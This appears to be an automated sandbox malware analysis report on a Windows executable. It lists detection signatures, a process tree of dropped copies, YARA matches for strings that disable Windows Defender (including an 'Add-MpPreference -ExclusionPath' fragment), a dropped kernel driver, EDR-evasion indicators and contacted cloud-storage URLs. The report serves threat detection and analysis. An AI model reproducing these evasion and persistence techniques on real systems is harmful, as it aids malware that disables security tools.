Edit tour

Windows Analysis Report
0000000000000000.exe

Overview

General Information

Sample name:	0000000000000000.exe
Analysis ID:	1582965
MD5:	4082e7b105c3e8adfa454f1b09890a2a
SHA1:	592725671389bbb3d2185f143b027f90dd89fc99
SHA256:	626b596d98fb4d517a9d154acaaaa215a185d13bf07d38fd1eb52940abe18e47
Tags:	backdoorexeuser-zhuzhu0009
Infos:

Detection

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Drops PE files to the document folder of the user

Found direct / indirect Syscall (likely to bypass EDR)

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Sample is not signed and drops a device driver

Tries to detect virtualization through RDTSC time measurements

AV process strings found (often used to terminate AV products)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates driver files

Creates files inside the driver directory

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Yara signature match

Classification

Process Tree

System is w10x64

0000000000000000.exe (PID: 6808 cmdline: "C:\Users\user\Desktop\0000000000000000.exe" MD5: 4082E7B105C3E8ADFA454F1B09890A2A)

Y1mbCC.exe (PID: 6992 cmdline: C:\Users\user\Documents\Y1mbCC.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

Y1mbCC.exe (PID: 3584 cmdline: C:\Users\user\Documents\Y1mbCC.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

Y1mbCC.exe (PID: 6108 cmdline: C:\Users\user\Documents\Y1mbCC.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

cleanup

Yara Signatures

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.Y1mbCC.exe.2870000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fc20:$e2: Add-MpPreference -ExclusionPath
7.2.Y1mbCC.exe.29d0000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fc20:$e2: Add-MpPreference -ExclusionPath
5.2.Y1mbCC.exe.2870000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fc20:$e2: Add-MpPreference -ExclusionPath

String found in binary or memory: 04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1email.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06www.google.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3login.yahoo.com39:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:293e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:71e9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:47login.skype.com92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43addons.mozilla.orgb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0login.live.comd8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0global trustee05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56*.google.com0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4cDigiNotar Root CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Services CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services 1024 CA0a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Root CA G2a4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21CertiID Enterprise Certificate Authority5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41DigiNotar Qualified CA46:9c:2c:b007:27:10:0dDigiNotar Cyber CA07:27:0f:f907:27:10:0301:31:69:b0DigiNotar PKIoverheid CA Overheid en Bedrijven01:31:34:bfDigiNotar PKIoverheid CA Organisatie - G2d6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar Extended Validation CA1e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Public CA 202546:9c:2c:af46:9c:3c:c907:27:14:a9Digisign Server ID (Enrich)4c:0e:63:6aDigisign Server ID - (Enrich)72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0UTN-USERFirst-Hardware41MD5 Collisions Inc. (http://www.phreedom.org/md5)08:27*.EGO.GOV.TR08:64e-islem.kktcmerkezbankasi.org03:1d:a7AC DG Tr equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: 3syd1z.oss-cn-beijing.aliyuncs.com

Source: 0000000000000000.exe	String found in binary or memory: http://bugreports.qt.io/
Source: 0000000000000000.exe	String found in binary or memory: http://bugreports.qt.io/_q_receiveReplyensureClientPrefaceSentMicrosoft-IIS/4.Microsoft-IIS/5.Netsca
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 0000000000000000.exe	String found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
Source: 0000000000000000.exe	String found in binary or memory: http://cevcsca2021.ocsp-certum.com07
Source: 0000000000000000.exe	String found in binary or memory: http://cipa.jp/exif/1.0/
Source: 0000000000000000.exe	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: 0000000000000000.exe	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: 0000000000000000.exe	String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: Y1mbCC.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 0000000000000000.exe	String found in binary or memory: http://ggbtu.be/b579179
Source: 0000000000000000.exe	String found in binary or memory: http://ggbtu.be/b579179yX
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0P
Source: Y1mbCC.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: 0000000000000000.exe	String found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
Source: 0000000000000000.exe	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: 0000000000000000.exe	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: 0000000000000000.exe	String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: Y1mbCC.exe.0.dr	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: Y1mbCC.exe.0.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Y1mbCC.exe.0.dr	String found in binary or memory: http://s.symcd.com06
Source: Y1mbCC.exe.0.dr	String found in binary or memory: http://s.symcd.com0_
Source: Y1mbCC.exe.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: Y1mbCC.exe.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: 0000000000000000.exe	String found in binary or memory: http://subca.ocsp-certum.com01
Source: 0000000000000000.exe	String found in binary or memory: http://subca.ocsp-certum.com02
Source: 0000000000000000.exe	String found in binary or memory: http://subca.ocsp-certum.com05
Source: Y1mbCC.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: Y1mbCC.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: Y1mbCC.exe.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: Y1mbCC.exe.0.dr	String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: Y1mbCC.exe.0.dr	String found in binary or memory: http://sw.symcd.com0
Source: Y1mbCC.exe.0.dr	String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: Y1mbCC.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Y1mbCC.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Y1mbCC.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Y1mbCC.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Y1mbCC.exe.0.dr, 189atohci.sys.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Y1mbCC.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 0000000000000000.exe	String found in binary or memory: http://upx.sf.net
Source: 0000000000000000.exe	String found in binary or memory: http://www.certum.pl/CPS0
Source: 0000000000000000.exe	String found in binary or memory: http://www.color.org)/S/GTS_PDFX/Type/OutputIntent
Source: 189atohci.sys.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 0000000000000000.exe	String found in binary or memory: http://www.extensis.com/meta/FontSense/
Source: 0000000000000000.exe	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: 0000000000000000.exe	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: 0000000000000000.exe	String found in binary or memory: http://www.npes.org/pdfx/ns/id/
Source: 0000000000000000.exe	String found in binary or memory: http://www.phreedom.org/md5)
Source: 0000000000000000.exe	String found in binary or memory: http://www.phreedom.org/md5)08:27
Source: Y1mbCC.exe.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: Y1mbCC.exe.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: 0000000000000000.exe, 00000000.00000003.2557361451.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2557361451.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.00000000004F0000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2557361451.00000000004C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/
Source: 0000000000000000.exe, 00000000.00000003.2557361451.00000000004C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/)pY
Source: 0000000000000000.exe, 00000000.00000003.2597126202.00000000004F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/2T
Source: 0000000000000000.exe, 00000000.00000003.2557361451.00000000004D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/7-2476756634-10024
Source: 0000000000000000.exe, 00000000.00000003.2557361451.00000000004D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/T
Source: 0000000000000000.exe, 00000000.00000003.2557361451.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.00000000004F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/XW
Source: 0000000000000000.exe, 00000000.00000003.2557361451.0000000000523000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2557361451.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gif
Source: 0000000000000000.exe, 00000000.00000003.2557361451.0000000000523000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gifI
Source: 0000000000000000.exe, 00000000.00000003.2557361451.0000000000523000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gifhttps://3syd1z.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: 0000000000000000.exe, 00000000.00000003.2557361451.0000000000523000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2557361451.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/b.gif
Source: 0000000000000000.exe, 00000000.00000003.2557361451.0000000000523000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/b.gifQ
Source: 0000000000000000.exe, 00000000.00000003.2557361451.00000000004C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/b.gifa
Source: 0000000000000000.exe, 00000000.00000003.2557361451.00000000004C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/b.gifs
Source: 0000000000000000.exe, 00000000.00000003.2557361451.0000000000523000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/c.gif
Source: 0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/c.gifY
Source: 0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/c.gifz
Source: 0000000000000000.exe, 00000000.00000003.2557361451.0000000000523000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.00000000004F0000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gif
Source: 0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gif%
Source: 0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gifE
Source: 0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gifO
Source: 0000000000000000.exe, 00000000.00000003.2597126202.00000000004F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gifjing.aliyuncs.com/~W
Source: 0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gifs
Source: 0000000000000000.exe, 00000000.00000003.2557361451.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.00000000004F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/fW
Source: 0000000000000000.exe, 00000000.00000003.2557361451.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.00000000004F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/hW
Source: 0000000000000000.exe, 00000000.00000003.2557361451.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.00000000004F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://3syd1z.oss-cn-beijing.aliyuncs.com/tW
Source: 0000000000000000.exe	String found in binary or memory: https://adoptium.net/
Source: 0000000000000000.exe	String found in binary or memory: https://adoptium.net/https://discord.gg/BdCcpDZ322562An
Source: Y1mbCC.exe.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: Y1mbCC.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: Y1mbCC.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0)
Source: Y1mbCC.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: 0000000000000000.exe	String found in binary or memory: https://discord.gg/BdCcpDZ
Source: 0000000000000000.exe	String found in binary or memory: https://www.certum.pl/CPS0
Source: 189atohci.sys.0.dr	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923

Source: unknown

HTTPS traffic detected: 39.103.20.97:443 -> 192.168.2.4:49891 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.Y1mbCC.exe.2870000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 7.2.Y1mbCC.exe.29d0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 5.2.Y1mbCC.exe.2870000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen

Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_0000000140006C95 NtAllocateVirtualMemory,		5_2_0000000140006C95
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_0000000140006C95 NtAllocateVirtualMemory,		7_2_0000000140006C95

Source: C:\Users\user\Documents\Y1mbCC.exe

Code function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,

5_2_0000000140001520

Source: C:\Users\user\Desktop\0000000000000000.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\0000000000000000.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Desktop\0000000000000000.exe

File created: C:\Windows\System32\drivers\189atohci.sys

Jump to behavior

Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_000000014000C3F0	5_2_000000014000C3F0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_000000014000CC00	5_2_000000014000CC00
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_0000000140001A30	5_2_0000000140001A30
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_000000014000C2A0	5_2_000000014000C2A0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_00000001400022C0	5_2_00000001400022C0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_00000001400110F0	5_2_00000001400110F0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_0000000140010CF0	5_2_0000000140010CF0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_0000000140009300	5_2_0000000140009300
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_000000014000BB70	5_2_000000014000BB70
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_0000000140003F80	5_2_0000000140003F80
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_00000001400103D0	5_2_00000001400103D0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_00007FFE11ECA1B8	5_2_00007FFE11ECA1B8
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_00007FFE11ED0248	5_2_00007FFE11ED0248
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_000000014000C3F0	7_2_000000014000C3F0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_000000014000CC00	7_2_000000014000CC00
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_0000000140001A30	7_2_0000000140001A30
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_000000014000C2A0	7_2_000000014000C2A0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_00000001400022C0	7_2_00000001400022C0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_00000001400110F0	7_2_00000001400110F0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_0000000140010CF0	7_2_0000000140010CF0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_0000000140009300	7_2_0000000140009300
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_000000014000BB70	7_2_000000014000BB70
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_0000000140003F80	7_2_0000000140003F80
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_00000001400103D0	7_2_00000001400103D0
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_00007FFE148CA1B8	7_2_00007FFE148CA1B8
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_00007FFE148D0248	7_2_00007FFE148D0248

Source: Joe Sandbox View

Dropped File: C:\Users\user\Documents\Y1mbCC.exe D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948

Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: String function: 0000000140006A65 appears 56 times
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: String function: 0000000140004F10 appears 46 times

Source: 0000000000000000.exe, 00000000.00000003.2597190639.0000000004B52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSa.dllp( vs 0000000000000000.exe
Source: 0000000000000000.exe, 00000000.00000003.2597066234.0000000004B52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSa.dllp( vs 0000000000000000.exe
Source: 0000000000000000.exe	Binary or memory string: OriginalFilenameSKlauncher 3.exe6 vs 0000000000000000.exe

Source: 6.2.Y1mbCC.exe.2870000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 7.2.Y1mbCC.exe.29d0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 5.2.Y1mbCC.exe.2870000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender

Source: 189atohci.sys.0.dr	Binary string: \Device\Driver\
Source: 189atohci.sys.0.dr	Binary string: \Device\TrueSight

Source: classification engine

Classification label: mal88.evad.winEXE@4/12@1/1

Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,		5_2_0000000140003F80
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,		7_2_0000000140003F80

Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,		5_2_0000000140001430
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,		7_2_0000000140001430

Source: C:\Users\user\Documents\Y1mbCC.exe

5_2_0000000140001520

Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,		5_2_0000000140001520
Source: C:\Users\user\Documents\Y1mbCC.exe	Code function: 7_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,		7_2_0000000140001520

Source: C:\Users\user\Desktop\0000000000000000.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].dat

Jump to behavior

Source: C:\Users\user\Desktop\0000000000000000.exe	Mutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
Source: C:\Users\user\Documents\Y1mbCC.exe	Mutant created: \Sessions\1\BaseNamedObjects\48c47662941

Source: 0000000000000000.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\0000000000000000.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 0000000000000000.exe

Virustotal: Detection: 19%

Source: 0000000000000000.exe	String found in binary or memory: " -jar ""--l4j-Startup error message not defined.Launcher:%s
Source: 0000000000000000.exe	String found in binary or memory: e_LowerCaseLongPathFF-ADDF
Source: 0000000000000000.exe	String found in binary or memory: /LOADINF="filename"

Source: C:\Users\user\Desktop\0000000000000000.exe

File read: C:\Users\user\Desktop\0000000000000000.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\0000000000000000.exe "C:\Users\user\Desktop\0000000000000000.exe"
